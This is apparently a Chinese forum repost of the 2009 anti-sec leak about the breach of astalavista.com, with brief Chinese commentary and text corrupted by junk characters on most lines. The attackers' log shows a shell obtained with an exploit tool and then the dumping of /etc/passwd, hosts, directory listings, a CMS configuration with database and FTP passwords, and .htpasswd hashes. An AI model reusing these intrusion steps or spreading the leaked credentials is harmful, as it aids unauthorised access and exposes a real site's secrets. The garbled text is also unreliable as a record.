里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。( [; C" d2 K7 i
' \ \' e9 M) ]( s- o
[root@front3 ~]# curl -I litespeedtech.com
: ^: T6 E: v- ~9 D0 SHTTP/1.1 200 OK q4 X* {; Q! e2 C5 q, ?1 g: J0 A% e
Date: Fri, 05 Jun 2009 22:54:51 GMT0 r9 |+ o1 @0 n- j4 _4 F
Server: LiteSpeed' V+ f3 c$ _& l: z" V8 r
8 K5 Y4 W) c7 E6 |
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-# e3 s3 _* [6 h1 G9 X6 H
9 H {7 _+ w, g$ G: b. @! O有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
3 U" I! V6 W! ]; y" K
3 c. w8 v2 R* B2 z# c& _3 f
) F5 ^% s9 h1 U/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 0 c8 C# x: j$ e
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
. J7 ~& w" O; s' [0 J7 d& x/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
1 m, ? Y" `4 T0 M, \) D\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
$ g" T( ]* k3 A# } \/ \/ \/ \/ \/ \/ \/
' r ?- D2 S) q! Z3 k) i The Hacking & Security Community! Z3 q5 U2 Q0 p1 Q- X! T5 ^4 h: s5 y
[+] Founded in 1997 by a hacker computer enthusiast
) i# \! b' L+ ~6 R% L2 L& X[-] Exposed in 2009 by anti-sec group* g6 U! H% T! J! R" `/ F5 p
$ i3 Z# g. d* ^3 [) ^1 k- k: k+ l
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
# O. B5 \0 h% Q/ S; V, Z>> 03. Who’s behind the site?3 l% @' A3 x6 _& ^
>>
( F% b k. J L6 E, ?>> A team of security and IT professionals, and a countless number of contributors from all over the world.
% ^" _- V( Y2 {9 e/ V( i8 F8 X8 U B" U$ A. ]$ R! } p
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
6 {8 y" _& D- j$ l" W8 B>>
2 h$ V& n8 J3 ?2 A! r4 z>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and/ ~; g& ^8 C, H) V1 Q
military institutions.
* m# p$ a, W0 ^0 e6 o>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.* v; ~& d4 t8 N
! }. t% i1 G% Z1 i3 B3 k
Why has Astalavista been targeted?
1 ^3 w. o9 B) }) M
8 F m* j1 p6 M+ C uOther than the fact that they are not doing any of this for the “community” but
! M! t# b3 R8 C0 X$ Kfor the money, they spread exploits for kids, claim to be a security community; e) U, W& L1 i6 p4 ~4 R. b! a- d
(with no real sense of security on their own servers), and they charge you $6.669 ~$ y- }. @7 |$ S( E7 J
per months to access a dead forum with a directory filled with public releases& N. R7 o0 M6 p; ^# ^7 v
and outdated / broken services.
0 w2 a& r* j: Q% X$ e" [8 I
' k$ m; p& n7 y+ x% m3 m- BWe wanted to see how good that “team of security and IT professionals” really is.
: n N, e2 O( x! L6 v% r8 k: v/ D% Y' X/ ]2 l( J6 g& Y
Let’s begin.# H7 z& c/ o" y* P5 M
4 s( D! T$ O4 X2 Panti-sec:~# ./g0tshell astalavista.com -p 80 T' P3 f3 c4 C( M1 ]
[+] Connecting to astalavista.com:808 z. d! D+ U4 ^( S+ u7 i& z$ Y* m
[+] Grabbing banner…
0 s% N+ s0 N1 j0 m. {% Q, eLiteSpeed
9 D/ b$ H# J/ ?; W: t. N: m7 Y[+] Injecting shellcode…, Y c6 {" N- I! E& c( P6 Y$ f& I
[-] Wait for it
- Y$ G% O: \# n3 C* m/ w! x4 Y* j5 c" v' O/ ?
[~] We g0tshell
; G& y( |0 [0 Z) m; [% I1 funame -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux; d$ ]0 j, }9 [. O1 j/ ?! `0 i F
ID: uid=100(apache) gid=500(apache) groups=500(apache)2 q! a# b1 z( k6 c S
8 A. N) N( C% m) I) b: z
sh-3.2$ cat /etc/passwd" s2 k, ?4 \* x
root:x:0:0:root:/root:/bin/bash
4 Q- W1 a1 _" y: V3 |8 Cbin:x:1:1:bin:/bin:/sbin/nologin
' v/ H( R: C! h* @! W. o7 Hdaemon:x:2:2:daemon:/sbin:/sbin/nologin
8 ]% M m- l4 j: Iadm:x:3:4:adm:/var/adm:/sbin/nologin$ h4 q+ O: s7 R# W2 y
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
6 S: Z( b- f2 ysync:x:5:0:sync:/sbin:/bin/sync
. O2 U2 h; I: Z! A7 V, K4 ashutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
2 P- `( N1 }# T3 J. A8 r* Ghalt:x:7:0:halt:/sbin:/sbin/halt" a& k) I2 n$ h6 y. C4 `6 N: D* O- O
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
6 [0 W( }/ L+ ]8 ?) unews:x:9:13:news:/etc/news:
4 _, J7 @0 f# juucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
( j7 U, g5 R* X. `2 Ioperator:x:11:0 perator:/root:/sbin/nologin
4 j) [( ?3 M$ M I2 }! _games:x:12:100:games:/usr/games:/sbin/nologin+ \4 v: f* m6 S5 x1 \0 E& z- G* q
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
" K& r. a k7 uftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
\. _$ a% y" _7 N! ^( T3 W4 inobody:x:99:99:Nobody:/:/sbin/nologin
q( X# `& a: U$ s% B/ @rpm:x:37:37::/var/lib/rpm:/sbin/nologin
: V/ \/ F6 f/ edbus:x:81:81:System message bus:/:/sbin/nologin% d& m" F, c% q
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
6 O1 I2 d" t1 S' B8 W( G. Kmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
* w2 {& g- R1 y3 [+ psmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
6 Q$ I1 E! L1 x$ D% h+ Dvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
6 Q; g! z9 F& ?. D; _ A# |8 {haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
3 \! B/ U1 U- `; [rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin R2 `/ {4 J/ U
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin" c8 D; r: t S* x- l2 {2 u
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin; A. }* Z0 Q) B; J- n6 F9 ]- P/ ^
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
/ h/ D2 z+ z# d* _pcap:x:77:77::/var/arpwatch:/sbin/nologin
) v) s3 i- a, _ E' pnamed:x:25:25:Named:/var/named:/sbin/nologin
8 S+ ]7 \3 u+ p2 }5 m8 K, fapache:x:100:500::/var/www:/bin/false
3 l+ Y0 D+ C: e4 m! Wdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
0 f' U. G: S7 L8 A3 T, omysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash) N0 W+ {) o0 K% i% ~
webapps:x:500:501::/var/www/html:/bin/bash- B2 |: H* }0 D0 j& A. {' d
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
6 ^( Q1 H+ n8 ~" Vadmin:x:501:502::/home/admin:/bin/bash
7 n- I, f0 ]/ j, `2 \# Xjon:x:502:503::/home/jon:/bin/bash' Z0 L" E4 j$ K
com:x:503:504::/home/com:/bin/bash. S3 ?) e4 L9 M) ?% \
ntp:x:38:38::/etc/ntp:/sbin/nologin% C% e' d: L! f5 P
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
% p; } v0 f2 i" i. E4 bastanet:x:504:505::/home/astanet:/bin/bash+ [. U) L. M# g1 A- Y
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
& F c5 U5 \4 {; W; S# aavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
+ E+ A+ Q# A+ [% U0 ^
0 P2 U8 D4 `/ A9 P9 x) c$ U+ Vsh-3.2$ cat /etc/hosts
5 X4 _, W S# A' \* R M# Do not remove the following line, or various programs
/ y% t6 k& t8 q- F9 Z) ^/ ^3 x# that require network functionality will fail.& @9 T) F1 Y& m! }: K! ~
127.0.0.1 localhost.localdomain localhost% y2 d0 r* z. M0 K8 M2 d" z g
::1 localhost6.localdomain6 localhost6. b* @$ [* L. D2 ^
80.74.154.172 asta1.astalavistaserver.com
) d% d7 @) D4 t9 d/ }% J3 a K7 Z l7 T" O
sh-3.2$ pwd
/ f" ?; [/ I$ [4 X9 X/home/com/public_html* j; J A, D P2 S& _
; e6 `! J- B6 ^- Z; v% Wsh-3.2$ ls -la; f6 h. L4 K1 K2 E9 N5 z( K
total 18460
; x: k4 a- L6 }3 s. h5 h+ a- Y4 Odrwxr-xr-x 30 com apache 4096 May 28 17:06 .3 u. Y0 _3 n& v6 H) \2 {' f
drwx–x–x 11 com com 4096 Jun 25 2008 ..
+ B K& B& K6 n3 kdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
1 ?) X- S+ Y# {% L5 ~9 c$ a( `9 w$ sdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache/ _: K# F2 N& a4 Z/ W; b
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
/ b3 J9 E6 i8 p2 G& E& y) r# |. idrwxrwxrwx 2 com com 4096 May 19 00:50 config
# C3 c2 Q# b2 L( b) {drwxr-xr-x 2 com com 4096 Mar 20 11:05 core3 c; s9 V2 |5 o2 V
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
; l& k+ r' P3 d0 F. ?/ _+ E. ~) Hdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing: L0 n, g5 x6 T. H2 w) h3 K* h
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo% W" w/ a/ I8 J$ ]6 M ]
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
% T$ ^. r( d1 u-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php# { o q. l8 A) H
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd+ o9 y, j/ s4 _2 q3 ~$ z
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor& L8 u# z& g+ a4 B1 a5 g
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
* @. z; [ H: F1 N* Udrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
; s) D% ^( O3 {8 o-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess6 k, F8 O# Y+ V& m! b" W/ U
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak+ U8 b! D' J3 q+ J5 G+ }% V
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak) Q' r" v* U2 c% h6 v
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
% Q7 P; M8 y7 F: |( O& H% Mdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
0 S9 f2 j# i9 f! J) a2 P, ^# v-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
5 e5 K5 l7 y. u9 v$ A2 `( a+ R+ ]: Xdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer6 ?6 |4 K s. Y' C3 T
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
: F& M R* G5 a/ G0 X' d, rdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib7 R ?' S6 {3 d4 ?8 C( e
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
: }' _; O4 C* w2 B: Z4 {drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
% B* `! A$ c5 V' m1 I0 Fdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
4 q8 C) g; T; gdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
. ]; M# ?! E! T7 o! f& t% Q3 c8 zdrwxrwxr-x 22 com com 4096 May 28 17:06 _new" T# R; U" n" T9 K) K6 q/ J
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
( z" L- g! L0 B, B& {7 U4 W3 C7 qdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy0 {& v# t m3 P* T
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
6 H7 k. M% s- _% j- K-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt- w- D% u& q0 f6 X0 ?
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml( z7 Q5 {% S4 ^* ~3 N" p" l C" D" E( P
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php$ L5 D8 @! f1 v1 A7 c
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes; U: t6 L% J" Z& P
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
# i* z+ p- S% tdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam: o. j/ R1 q- T5 a4 v
3 P) C6 n. _# S4 l, }/ I
sh-3.2$ head -20 index.php
% L* ~+ n9 [7 j' s<?php
! b" K: t; M2 L6 M' u& A3 ]; B% P* H( n4 r# f! j. j
/**
( O7 S; B0 R2 y; _1 W& Y! V" t8 |* The main page for the CMS
) X8 {+ j4 s- g% l2 r* @copyright CONTREXX CMS - COMVATION AG
6 \, u3 _* Y. N& |* @author Comvation Development Team
( |( g5 N$ f# ^& G: ?: E* @version v1.0.9.10.1 stable( g y" L2 }3 {0 ?3 c0 V; z, ~
* @package contrexx- t3 W; d/ [6 d
* @subpackage core5 B# J# ^0 m( d. L
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
4 S: F! u2 A$ Z5 l/ q/ L4 i2 x* @since v0.0.0.0& T$ E7 L; Y- e* W
* @todo Capitalize all class names in project8 W) L# i- ?* L) H1 e- u
* @uses /config/configuration.php
; `4 E ?# \# \8 u, E6 Z; [( S( A* @uses /config/settings.php7 G' ?9 I2 Y. p3 `1 \' k0 P
* @uses /config/version.php
T# @4 B$ W/ U* @uses /core/API.php$ C- o0 }2 @- F0 J3 N h5 n
* @uses /core_modules/cache/index.class.php
0 p' j2 v6 |$ ^4 l' A# ?0 T* @uses /core/error.class.php
2 ~- n; R/ ^$ y( M4 B* @uses /core_modules/banner/index.class.php* a. d1 k4 x4 [3 ~/ ]
* @uses /core_modules/contact/index.class.php: W/ m1 N- s) M2 c
' D% f: h6 v# s) s5 Z6 wsh-3.2$ cd config/; O9 p1 O8 U% i% T
sh-3.2$ ls -la
3 _+ V( z! M0 A' T9 htotal 32
4 |& l1 L: Z- O' w0 v( hdrwxrwxrwx 2 com com 4096 May 19 00:50 .2 g/ ]3 u. T: V5 e6 f+ e( F
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
0 @; ?7 m; a+ l-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php9 j3 m4 @1 z+ v# h& c
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
5 G5 x+ g+ S1 y! w5 F$ J-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
( a. A" P8 M* i" W6 L) [-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
; M1 N2 _ _2 ^" s2 V6 V: P) v$ f9 X, S& ^/ E. W, b
sh-3.2$ cat configuration.php1 ], L- @; n* K9 h0 ~# ?8 t4 d
[snip]
6 q. ^7 A2 ]9 X, `+ c4 B$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost& }5 X) Y7 o3 D* }) X& y& C
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
G9 M& k; d$ H, G% j+ b# X7 r$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix' W& e; p) m0 t8 W, }5 q7 y& i
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username0 Q# n- N# F3 r
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password" s2 Q) g* K3 R$ N' R
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
) r6 P/ c# A% Q# Y$ @" q$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
2 j0 _' i4 p j- h6 g$ H. `0 b- i[snip]
/ _3 d9 F+ s( k4 c% e' X: L* T7 U$_FTPCONFIG['is_activated'] = true; // Ftp support true or false) U6 g' u4 {1 K
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
7 R) K! v6 c. D2 F: K$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost j" w5 c) z9 B8 r* x$ x8 `
$_FTPCONFIG['port'] = 21; // Ftp remote port
# M8 a( C6 t: V0 E9 W$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
* L% g5 X" G/ U& w* P. b/ S$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
# J0 E9 d. I2 d! L8 x; ^) {! b$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms- \' t) q6 d$ L$ D* w3 G
0 r/ M; F* U3 m K
sh-3.2$ cd ..: p1 K1 p( `' I S* Y
sh-3.2$ cd dvd/
& d) \$ |/ o' d. Ush-3.2$ ls -la5 A. K! C4 k0 v/ D8 ~# K; G
total 2913780+ ]& x" F3 k+ ]$ z
drwxr-xr-x 2 com com 4096 Sep 9 2008 .; u9 \4 }, M, ?( w* R" _! X
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..$ b* r7 b6 \: i& P
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
( A6 _7 ~- d) y4 s-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar% i9 ]* D! q; J+ s5 x* f7 z
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
. r* p, q8 E' ?& C9 n-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess4 a/ d- m% y% m" g& ~8 V
2 F. o M* c& K! ]3 P; ^" L( f( e5 jsh-3.2$ cat .htaccess3 F- ^: @& [" A
authType Basic9 V+ ^: W5 I& \9 v( H9 Y3 e
authName DVD# v% I+ ]& `% y$ u- l" V$ A
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
$ V% t% J4 O9 j0 n3 V) q7 K( Zrequire valid-user/ \6 j% q1 P( x) i
9 [+ W7 _; D5 E- @1 `
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
! C/ i1 }. V, H1 [ jDVDdownload:CRD8cuY6.MPT6
3 z9 c d* M) zDVDdownload2:CR8a36.wluFMg! u9 \+ M; d$ l0 ?
6 O P, \- f5 U6 A9 H# @
sh-3.2$ cat test.php/ q) O) W A8 ]5 n0 V. ~
<?php J t0 Z! T7 J1 R2 i& }7 U
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;; k) F5 q9 w. a) h. D; q P* w
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));8 R0 P$ R. U9 M; F3 W" _
echo $url;
3 C- N" n$ N" w! O; ]+ G" e$ V7 T?>
+ H; A! a e; t3 h
' S, c# i- y% O4 i6 C2 ~! Ssh-3.2$ cd modifications/# I+ R7 m, v. U) z: c% L0 @4 M
sh-3.2$ ls -la4 }. \* {/ d3 P- j
total 32
2 S# F# n1 S, A$ u% K9 a Udrwxr-xr-x 8 com com 4096 May 11 12:48 .5 c# C H# V! _( l# ?/ d: W
drwxr-xr-x 30 com apache 4096 May 28 17:06 .." W7 J/ k, H! D2 O7 g
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng% R. U% R3 V! F1 r/ V
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
. E: q: c8 M" T0 c% l }9 X/ Fdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
3 c5 z3 F6 D5 u+ Q" Q. Qdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc* j7 F# s- x$ o9 L0 [1 U
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
" _6 ^3 V# V+ N2 b; Sdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
: V5 N2 \% c; {: |8 l, D$ O# P ^. {$ \( b. j
sh-3.2$ ls -R- q; D6 n. h; Q4 C1 r
.:8 Z2 w. @* Q! E# c
com_avtng cronjobs onlinetools pjirc search _tmp" |+ B, e! U9 M# d i! T* d1 ~
9 H$ i) v! C% D) Z' A
./com_avtng:
, y! p0 o8 t2 r/ r9 D' }+ m4 B+ iavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
8 z) e& J3 `3 R
|7 a" e: P/ K./com_avtng/scripts:
* N# j5 ^4 [# h; N. h' y! }$ l5 r+ npopunder.js
# d( g8 S* v R$ d" P$ X" W" `, @8 b/ b1 ]" F1 @
./cronjobs:" A7 W1 t7 y) Q* x
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp8 n' j3 L% ^2 n5 L! `) L6 n
+ X9 S. X# Z4 ]5 O7 q( z
./cronjobs/tmp:) u4 R J" b8 p4 x8 v1 j
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
7 x+ O- E2 s% K, a4 k5 U. j. D' [7 S) {2 Z
./onlinetools:
: ~: w5 ^% V, b- ]+ D1 B: y% Bindex.php
6 ]' \! [* N' a5 p. s5 J
$ c) `; a5 L- o% N8 S3 p; v7 {./pjirc:
9 w; j& |6 `) d$ F# h& G/ Ja_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
k- Q7 u7 O' P4 @AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
8 G7 ^2 x4 \$ J3 \background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd4 A) Q$ b! }" d4 S6 M, c/ u
# a$ a+ R! e* w" h* l$ _9 s./pjirc/img:
+ x9 R0 N+ G" j) yange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif( V9 M3 F# a' Z9 W- B! ]
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
6 _& k) e5 c Fverre-eau.gif
' q( j/ G9 c# K( Z: G$ xargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
. k+ o( J% a, m# V/ nverre-vin.gif
$ I. Z% {9 W) v! }+ H; @ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif( n: ?4 G0 X q# }& N
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
9 g, g; D+ v7 G0 r9 R# i) p# n
' }3 X: ]# B$ ?% {5 J4 z./pjirc/snd:
! o( g2 W: d4 s- F7 Y4 dbell2.au ding.au A% J; }9 [1 X4 Z
9 d, Z$ w! F- n/ P6 F/ Z5 s- ]! y
./search:
' B5 X3 I" b. ]3 T3 psearchEngines.php search.php/ `; [/ o& I5 P( s/ q7 Q
# m& I( o( ~' l6 h/ { u- y/ Z: Y
./_tmp:
2 V" M# c& m* @- b+ o6 @, F7 ~defaultPorts.php defaultPorts.txt0 M3 [+ S& [$ p& c, T) H3 L
4 U5 _4 i0 l! g. B8 N/ e Q; ~; k$ }sh-3.2$ cd cronjobs/; r& F, J9 I7 u( O" _7 M$ q
sh-3.2$ cat exploits.php
- E6 S( w8 K) U5 m: V[snip], _" A6 v: E# |( i
$categories = array();; l. u/ I; [" V$ N8 `
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
3 W! C7 d* d/ o; l7 I, U: m" ?$expolits = file($milw0rmFile);
n4 N( d) S! X$comExploits = array();
- I1 h2 t2 v. m1 n8 u6 u[snip]" {& p" _) K5 `6 ]9 Y& `0 h1 Y
// manage data
/ c7 M Y$ `9 s( R( l3 ifor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26406 y; _4 p2 Y! l8 d0 q; x. H
. v1 G& p3 L& h( k // get path and title8 _ G5 [2 H: P$ x9 Q3 h2 j
$expolits[$x] = trim($expolits[$x]);8 J7 b- A9 \/ }5 y! v, h
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
- v. y9 j* y8 @; Z2 ] $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
; V' o0 S+ o. p$ m Y6 Q* D( e, q4 c, K3 R& D( d6 x' t/ l
// check if file exists
$ b& z3 c/ h/ I% s if (file_exists($path)) {; t0 |6 A/ N$ C h6 l
( b1 o4 R8 ^( e7 ?# ]. l
$text = file_get_contents($path);
0 {5 i/ D( P. G) v3 H% q* O: {8 w" Y9 H" \- E! m
// get content and date
8 |2 k- P; ?/ N6 b+ [ //$text = htmlspecialchars($text, ENT_QUOTES);
% @0 J7 W' M' y) N* K7 q $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));9 q' c* D3 [+ q; x$ O6 x9 r
if ($tmptext != ”) {
; c4 Q) s# P2 [1 A0 i5 L3 J" W: r $text = $tmptext;# j' o+ o& D& V/ V. b+ |
} else {
" m, V- [, m; S( E $text = addslashes(htmlentities($text, ENT_QUOTES));& z) U$ i& W% I( @
}
% g0 [ h* z; X F! l% C5 n/ ? $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));& z( t- H- C: v! N
$tmp = explode('-', $date);
1 g6 f2 A0 [# P" G6 T& \ $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
X! G) d/ \/ S( @ $cat = getCategory ($path);
3 Q7 J5 G3 p$ X $ext = pathinfo(basename($path));
2 w* r1 v( g6 Q( D1 Q2 x1 N $ext = $ext['extension'];
8 c2 z% I p) R/ u- m$ k $qStr = ”( W4 R, f) Y- C1 w
SELECT `id`( H. f& r9 e" v& P2 V+ w
FROM `contrexx_module_exploits`# m m% E& [8 i7 R0 X& y1 l
WHERE `title` = ‘” . $title . “‘9 u" _6 t1 A% g V, Z1 B
AND `date` = ‘” . $date . “‘
T4 `/ d; h0 ^ “;
2 d( M- l7 U3 [2 S8 | echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;) o! R" S& y4 c# v& s) }+ z
$q = $_objDB->query($qStr);
: f N9 V7 j7 _- A5 v8 t& Z
0 n* L6 m) t* |7 S* y$ X1 H( c if ($q->numRows() == 0) {
9 D6 ^ i% H& Q9 [% u
h1 i% f7 S% H- A; }4 n& ]' Q // prepare array
1 S0 m5 H7 j+ D8 } $comExploits[$x]['date'] = $date;" E5 ]& V D' X/ _. ?
$comExploits[$x]['title'] = $title;
5 S* p; w# e/ w% ^5 E, c: h $comExploits[$x]['author'] = ‘milw0rm’;0 M6 D) `/ N- C, @5 K. h
$comExploits[$x]['text'] = $text;
; H5 y2 ^9 n' I, T2 N0 R $comExploits[$x]['source'] = $ext;- w8 a% V3 S; m7 k4 ~* P" r
$comExploits[$x]['url1'] = ”;
$ K) B" S% T& | $comExploits[$x]['url2'] = ”;
: r& p4 l! x- B* f' N $comExploits[$x]['catid'] = $cat;
4 E8 Q9 f7 v7 p $comExploits[$x]['lang'] = ‘2′;% {+ M: x# g, `6 [/ ~( Z y V4 n
$comExploits[$x]['userid'] = ‘12′;6 Q2 K" k; T w- _
$comExploits[$x]['startdate'] = ‘0000-00-00′;: s0 D6 \) H# A, g. t( t& V
$comExploits[$x]['enddate'] = ‘0000-00-00′;
% D- N0 i7 J! q $comExploits[$x]['status'] = ‘1′;
4 ^% p9 J% F0 Z" G $comExploits[$x]['changelog'] = $date;
4 h; n4 a* l. U/ W; g( D4 g& o3 e
* w( B6 a3 h; j% }/ E P' o }
- D( _% H4 B9 m8 l5 _* o8 M[snip]
8 R9 g% }6 k! G, a0 g $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
% Q/ D4 e6 Z& L2 D" p<rss version=”2.0″>
2 `3 X6 R2 ]" W8 J3 e \* ?: ? <channel>7 o5 K8 g" {6 _+ {1 h( H! q* h1 k
